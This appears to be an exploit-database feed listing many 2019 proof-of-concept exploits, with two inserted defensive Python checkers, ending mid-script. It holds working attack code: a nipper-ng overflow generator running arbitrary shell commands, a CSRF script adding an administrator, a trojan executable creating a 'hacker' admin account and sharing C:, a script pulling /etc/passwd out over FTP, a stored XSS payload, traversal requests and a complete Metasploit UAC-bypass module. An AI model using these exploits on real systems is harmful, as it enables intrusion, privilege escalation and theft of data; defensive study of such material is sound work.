Channel: Exploit Collector

Open Proficy HMI-SCADA 5.0.0.25920 Denial Of Service


Open Proficy HMI-SCADA version 5.0.0.25920 suffers from a denial of service vulnerability.


MD5 | 64ca0afe85c1b214c34f0f0c11041be0

# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-16
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
# Software Link: App Store for iOS devices
# GE Intelligent Platforms, Inc.
# Tested Version: 5.0.0.25920
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2

# Steps to Produce the Crash:
# 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py
# 2.- Copy content to clipboard
# 3.- Open "Open Proficy HMI-SCADA for iOS"
# 4.- Host List > "+"
# 5.- Add Host
# 6.- Address Type "IP Address"
# 7.- Host IP Address "192.168.1.1"
# 8.- User Name "l4m5"
# 9.- Paste ClipBoard on "Password"
# 10.- Add
# 11.- Connect
# 12.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 2500
print (buffer)


Crystal Live HTTP Server 6.01 Directory Traversal


Crystal Live HTTP Server version 6.01 suffers from a directory traversal vulnerability.


MD5 | 9d4260e2999b76e3021c14066da0c499

# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version: Crystal Quality 6.01.x.x
# Software Link: https://www.crystalrs.com/crystal-quality-introduction/


POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
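The request above escapes the document root because the server joins the request-target onto the docroot without normalising it first. As an added example (not part of the advisory), the Python below shows the check a web server should apply: decode, normalise, and refuse any target that resolves outside the docroot. The docroot "/srv/www" and the request line are constructed sample inputs, the latter copied from the PoC.

```python
import posixpath
from urllib.parse import unquote

# Request line from the PoC above (constructed copy of the advisory's request)
POC_REQUEST_LINE = "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1"


def request_target(request_line):
    """Return the request-target of an HTTP/1.1 request line ('GET /path HTTP/1.1' -> '/path')."""
    parts = request_line.split()
    if len(parts) != 3:
        raise ValueError("malformed request line")
    return parts[1]


def resolve_under_root(docroot, target):
    """Map a request-target to a filesystem path, or return None when it would escape docroot.

    Percent-decoding happens before normalisation so encoded dots (%2e%2e) are caught too,
    and backslashes are treated as separators because the affected server runs on Windows.
    """
    root = posixpath.normpath(docroot)
    # drop any query string, decode once, and unify separators
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    # always join relative to the docroot, whatever leading slashes the client sent
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    # the resolved path must be the docroot itself or something strictly beneath it
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def is_traversal_attempt(docroot, request_line):
    """True when the request line would be served from outside the docroot."""
    return resolve_under_root(docroot, request_target(request_line)) is None


if __name__ == "__main__":
    print("PoC request rejected:", is_traversal_attempt("/srv/www", POC_REQUEST_LINE))
```

The same function rejects the encoded and backslash variants a scanner would try next, while still allowing harmless "/docs/../index.html" style paths that stay inside the docroot.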

TemaTres 3.0 Cross Site Request Forgery


TemaTres version 3.0 suffers from a cross site request forgery vulnerability.


MD5 | e8b3eeba117e93d31065972e40d48400

# Exploit Title: TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : CVE-2019-14345
# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10

# Description:
# Web application for the management of formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies.

# Exploit

import requests
import sys

session = requests.Session()

# Traffic is routed through a local intercepting proxy (Burp) on 127.0.0.1:8080
http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"

proxyDict = {
    "http": http_proxy,
    "https": https_proxy
}

# Log in to obtain a PHPSESSID; the admin form is then submitted with that session
url = 'http://localhost/tematres/vocab/login.php'
values = {'id_correo_electronico': 'pablo@tematres.com',
          'id_password': 'admin',
          'task': 'login'}

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']

print(cookie)

host = sys.argv[1]
user = input('[+]User:')
lastname = input('[+]lastname:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
email = input('[+]Email:')

if password == password2:
    # configure proxy burp

    # Same fields the "add user" form posts; no anti-CSRF token is required
    data = {
        '_nombre': user,
        '_apellido': lastname,
        '_correo_electronico': email,
        'orga': 'bypassed',
        '_clave': password,
        '_confirmar_clave': password2,
        'isAdmin': 1,
        'boton': 'Guardar',
        'userTask': 'A',
        'useactua': ''
    }
    headers = {
        'Cookie': 'PHPSESSID=' + cookie
    }
    request = session.post(host + '/tematres/vocab/admin.php', data=data,
                           headers=headers, proxies=proxyDict)
    print('+' + '-' * 50 + '+')
    print('Status Code:' + str(request.status_code))

else:
    print("Passwords don't match!!!")

Foscam Video Management System 1.1.4.9 Denial Of Service


Foscam Video Management System version 1.1.4.9 username denial of service proof of concept exploit.


MD5 | f4ed71a0cf156255d4e06a58ba562112

# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Author: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"/"IPC"
# 6.- Copy the content of the file into Username
# 7.- Click on Login Check
# 8.- Crashed

buffer = "\x41" * 520
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()

nipper-ng 0.11.10 Remote Buffer Overflow


nipper-ng version 0.11.10 suffers from a remote buffer overflow vulnerability.


MD5 | d4babeb02a84d1101e6c163b25b3b907

# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
# Date: 2019-10-20
# Exploit Author: Guy Levin
# https://blog.vastart.dev
# Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng
# Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source
# Version: 0.11.10
# Tested on: Debian
# CVE : CVE-2019-17424

"""
Exploit generator created by Guy Levin (@va_start - twitter.com/va_start)
Vulnerability found by Guy Levin (@va_start - twitter.com/va_start)

For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post
https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html

may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems
"""

import sys
import struct

def pack_dword(i):
return struct.pack("<I", i)

def prepare_shell_command(shell_command):
return shell_command.replace("", "${IFS}")

def build_exploit(shell_command):
EXPLOIT_SKELETON = r"privilage exec level 1 " \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \
"aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \
"kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \
"acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \
"uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \
"adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \
"faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \
"aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \
"paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \
"agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \
"zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \
"ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \
"kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \
"ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj"

WRITEABLE_BUFFER = 0x080FA001
CALL_TO_SYSTEM = 0x0804E870
COMMAND_BUFFER = 0x080FA015

OFFSET_FOR_WRITEABLE_BUFFER = 0x326
OFFSET_FOR_RETURN = 0x33a
OFFSET_FOR_COMMAND_BUFFER = 0x33e

OFFSET_FOR_SHELL_COMMAND = 0x2a
MAX_SHELL_COMMAND_CHARS = 48

target_values_at_offsets = {
WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER,
CALL_TO_SYSTEM : OFFSET_FOR_RETURN,
COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER
}

exploit = bytearray(EXPLOIT_SKELETON, "ascii")

# copy pointers
for target_value, target_offset in target_values_at_offsets.items():
target_value = pack_dword(target_value)
exploit[target_offset:target_offset+len(target_value)] = target_value

# copy payload
if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
raise ValueError("shell command is too big")
shell_command = prepare_shell_command(shell_command)
if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
raise ValueError("shell command is too big after replacing spaces")

# adding padding to end of shell command
for i, letter in enumerate(shell_command + "&&"):
exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter)

return exploit

def main():
if len(sys.argv) != 3:
print(f"usage: {sys.argv[0]} <shell command to execute> <output file>")
return 1

try:
payload = build_exploit(sys.argv[1])
except Exception as e:
print(f"error building exploit: {e}")
return 1

open(sys.argv[2], "wb").write(payload)

return 0 # success

if __name__ == '__main__':
main()

TemaTres 3.0 Cross Site Scripting


TemaTres version 3.0 suffers from a persistent cross site scripting vulnerability.


MD5 | 6f25a6e1c11e44890bac7aca68f875ae

# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : CVE-2019-14343
# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053
# Tested on: Windows 10

# Description:
The parameter "value" is vulnerable to stored cross-site scripting.

# Payload: "><script>alert("XSS")<%2fscript>

POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
Upgrade-Insecure-Requests: 1

doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2

MobileGo 8.5.0 Insecure File Permissions


MobileGo version 8.5.0 suffers from an insecure file permission vulnerability.


MD5 | 01b469607a40a0f08aba37d07b840883

# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7


# Proof of Concept (PoC):
==========================
C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

APKInstaller.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

BsSndRpt.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

DriverInstall.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

fastboot.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

FetchDriver.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

MGNotification.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

MobileGo.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

MobileGoService.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

unins000.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

URLReqService.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

WAFSetup.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

WsConverter.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)

WsMediaInfo.exe Everyone:(I)(F)
AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)



#Exploit code(s):
=================

1) Compile the C code below and name it "MobileGo.exe"

#include <windows.h>

int main(void){
    system("net user hacker abc123 /add");
    system("net localgroup Administrators hacker /add");
    system("net share SHARE_NAME=c:\\ /grant:hacker,full");
    /* hand over to the renamed original so the user sees the normal application */
    WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
    return 0;
}

2) Rename the original "MobileGo.exe" to "~MobileGo.exe"
3) Place the malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE.
Privilege escalation successful.

Centova Cast 3.2.11 Arbitrary File Download


Centova Cast versions 3.2.11 and below suffer from an arbitrary file download vulnerability.


MD5 | 06295d9b498967fba1d7e043f6b5e745

# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download
# Date: 2019-11-17
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.11
# Tested on: Debian 9, CentOS 7

#!/bin/bash
if [ "$4" = "" ]
then
    echo "Usage: $0 centovacast_url user password ftpaddress"
    exit 1
fi
url=$1
user=$2
pass=$3
ftpaddress=$4

# Ask the API to copy the requested file into the account's FTP area as 1.tmp,
# then retrieve it over FTP with the same credentials
dwn() {
    curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp"
    wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O "$2"
}

dwn /etc/passwd passwd
echo "

/etc/passwd:
"
cat passwd


Windows Escalate UAC Protection Bypass


This Metasploit module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when Windows backup and restore is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked.


MD5 | 4f1cab9439a2a2fee0bb0c73a655df7d

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)',
      'Description'    => %q(
        This module will bypass Windows UAC by hijacking a special key in the Registry under
        the current user hive, and inserting a custom command that will get invoked when
        Windows backup and restore is launched. It will spawn a second shell that has the UAC
        flag turned off.

        This module modifies a registry key, but cleans up the key once the payload has
        been invoked.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => [
        'enigma0x3',    # UAC bypass discovery and research
        'bwatters-r7',  # Module
      ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        => [
        [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
      ],
      'DefaultTarget'  => 0,
      'Notes'          =>
        {
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        },
      'References'     =>
        [
          ['URL', 'https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/'],
          ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1'],
          ['URL', 'https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass']
        ],
      'DisclosureDate' => 'Mar 17 2017'
    )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )

  end

  def check
    if sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def write_reg_values(registry_key, payload_pathname)
    begin
      registry_createkey(registry_key) unless registry_key_exist?(registry_key)
      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
      registry_setvaldata(registry_key, '', payload_pathname, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
  end

  def exploit
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
    remove_registry_key = !registry_key_exist?(registry_key)

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status("win_dir = " + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status("tmp_dir = " + tmp_dir)
    exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    target_filepath = exploit_dir + "sdclt.exe"
    vprint_status("exploit_file = " + target_filepath)

    # make payload
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) + '.exe'
    payload_pathname = tmp_dir + '\\' + payload_name
    vprint_status("payload_pathname = " + payload_pathname)
    vprint_status("Making Payload")
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
    write_reg_values(registry_key, reg_command)

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")

    vprint_status("Launching " + target_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
    rescue ::Exception => e
      print_error("Executing command failed:\n#{e}")
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
    # wait for a few seconds before cleaning up
    print_status("Please wait for session and cleanup....")
    sleep(20)
    vprint_status("Removing Registry Changes")
    if remove_registry_key
      registry_deletekey(registry_key)
    else
      registry_deleteval(registry_key, "DelegateExecute")
      registry_deleteval(registry_key, '')
    end
    print_status("Registry Changes Removed")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    case is_in_admin_group?
    when true
      print_good('Part of Administrators group! Continuing...')
      if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
        fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
      end
    when false
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    when nil
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    end
  end

end

cryptmount Filesystem Manager 5.3.2


cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.


MD5 | a52707f76ff4c3baa81c43a392962b8a


BartVPN 1.2.2 Unquoted Service Path


BartVPN version 1.2.2 suffers from a BartVPNService unquoted service path vulnerability.


MD5 | 6e89cac93c8e77ebd174c47999311c35

#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.filehorse.com/
#Link Software : https://www.filehorse.com/download-bartvpn/
#Tested on OS: Windows 7


#Analyze PoC :
==============


C:\Users\ZwX>sc qc BartVPNService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: BartVPNService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BartVPNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Microsoft Windows 7 (x86) BlueKeep RDP Use-After-Free

XMedia Recode 3.4.8.6 Denial Of Service


XMedia Recode version 3.4.8.6 suffers from a denial of service vulnerability.


MD5 | e1b5cb9ed05d8580baf8dede64d61ce9

#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.xmedia-recode.de/
#Link Software : https://www.xmedia-recode.de/download.php
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr

'''
Proof of Concept (PoC):
=======================

1. Download and install XMedia Recode
2. Run the Python script below, which creates a file (poc.m3u)
3. In the software, go to "File -> Open File" and add the .m3u file
4. XMedia Recode crashes
'''

#!/usr/bin/python

# A single playlist entry of "http://" followed by 500 'A' characters
http = "http://"
buffer = "\x41" * 500

poc = http + buffer
file = open("poc.m3u", "w")
file.write(poc)
file.close()

print("POC Created by ZwX")

Studio 5000 Logix Designer 30.01.00 Unquoted Service Path


Studio 5000 Logix Designer version 30.01.00 suffers from an unquoted service path vulnerability.


MD5 | 9f0dbfc3b3eee08dce605d2ff9bd6240

# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
# Rockwell Automation Technologies
# Tested Version: 30.01.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """

FactoryTalk Activation Service FactoryTalk Activation Service C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe Auto

# Service info:

C:\>sc qc "FactoryTalk Activation Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FactoryTalk Activation Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FactoryTalk Activation Service
DEPENDENCIES : winmgmt
: wmiapsrv
: +NetworkProvider
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
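The wmic and sc output above is what an auditor inspects by hand. As an added example (not part of the advisory), the Python below parses `sc qc` output and reports exactly the condition described: an unquoted image path containing spaces for a service that starts as LocalSystem, together with the quoted binPath an administrator would set to close it. The sample output is copied from the Studio 5000 advisory; the helper names are my own.

```python
import re

# `sc qc` output copied from the advisory above (sample input for the checker)
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FactoryTalk Activation Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Rockwell Software\\FactoryTalk Activation\\lmgrd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FactoryTalk Activation Service
        DEPENDENCIES       : winmgmt
                           : wmiapsrv
                           : +NetworkProvider
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Return FIELD -> value for the single-valued fields of `sc qc` output.

    Continuation lines (extra DEPENDENCIES entries) carry no field name and are skipped.
    """
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def executable_part(binary_path):
    """Split BINARY_PATH_NAME into (quoted, image_path).

    If the path is quoted, the image path is unambiguous. If not, Windows tries each
    space-delimited prefix in turn, so the image path is taken to run up to the first
    ".exe" token; anything after it is arguments.
    """
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return True, (p[1:end] if end != -1 else p[1:])
    m = re.match(r"(.*?\.exe)(\s|$)", p, re.IGNORECASE)
    return False, (m.group(1) if m else p)


def quoted_binpath(binary_path):
    """The remediated binPath value: the image path wrapped in quotes, arguments untouched."""
    quoted, exe = executable_part(binary_path)
    stripped = binary_path.strip()
    if quoted:
        return stripped
    return '"' + exe + '"' + stripped[len(exe):]


def assess_service(text):
    """Evaluate one `sc qc` dump against the unquoted-service-path condition."""
    f = parse_sc_qc(text)
    binpath = f.get("BINARY_PATH_NAME", "")
    quoted, exe = executable_part(binpath)
    unquoted_with_spaces = (not quoted) and (" " in exe)
    runs_as = f.get("SERVICE_START_NAME", "")
    return {
        "service": f.get("SERVICE_NAME", ""),
        "exe": exe,
        "unquoted_with_spaces": unquoted_with_spaces,
        "auto_start": "AUTO_START" in f.get("START_TYPE", ""),
        "runs_as": runs_as,
        # the finding only matters when the unquoted path is resolved by a privileged account
        "finding": unquoted_with_spaces and runs_as == "LocalSystem",
        "fix_binpath": quoted_binpath(binpath),
    }


if __name__ == "__main__":
    result = assess_service(SC_QC_OUTPUT)
    for k, v in result.items():
        print(f"{k}: {v}")
```

The fix_binpath value is what `sc config <name> binPath= "..."` should be set to; a path without spaces (or one already quoted) is reported as not affected.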

Centova Cast 3.2.12 Denial Of Service


Centova Cast version 3.2.12 denial of service proof of concept exploit.


MD5 | 7d2b1421b9153e8e920109091a56d827

# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.

#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3


dwn() {
echo -n .
